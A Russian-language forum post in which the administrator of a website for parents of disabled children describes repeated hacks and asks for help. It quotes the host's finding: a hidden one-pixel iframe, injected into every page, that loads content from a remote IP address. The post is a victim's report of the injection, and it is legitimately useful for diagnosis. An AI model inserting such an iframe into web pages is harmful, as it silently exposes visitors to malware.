Вложений: 4
Вирус экспортируется на сайт?
Помогите пожалуйста - не пойму в чем дело. У меня сайт на RuWeb'е - я и автор и админ. "Веселье" началось 4 апреля, когда не открылась пользователям стартовая страница, а гостевая книга и форум были блокированы. Мне позвонила одна форумчанка (сайт для родителей с детьми-инвалидами) и сказала, что её на форум антивирус не пускает.
Я позвала специалиста и он из бекапа восстановил сайт. Но 6 апреля все повторилось снова. Теперь уже разбирались с хостерами сами.
Вот что они написали: "Ваш сайт взломан, в конце каждой страницы добавляется код
<!-- ~ --><iframe src="http://89.149.196.151/~xmobile/ru/index.php" width=1 height=1 style="display:none"></iframe>
Судя по всему, у Вас или используются нестойкие к взлому пароли(администратор хостинга/cms/пользователь базы данных) или используется cms с уязвимостями (особенно опасны в этом отношении самописные, в широко используемых cms типа joomla такие уязвимостей давно нет) или Ваш компьютер заражён вирусом, и пароли перехватываются.
В последнее время такие взомы участились из-за появившегося вируса, взлом происходит автоматически.
Вы чистите свой компьютер от вирусов, и меняете все свои пароли".
В общем, они все восстановили, я почистила комп DrWeb'ом и поменяла пароли.
1 раз зашла в админку! Все - через 2 часа ни форума ни гостевой снова не было.
Тогда прочитала информацию у Вас на сайте в какой последовательности и что надо делать. Прикрепила файлы о которых Geser и NickGolovko писали. Не пойму - система, кажется, без вирусов. Можно успокоиться и искать причины в другом?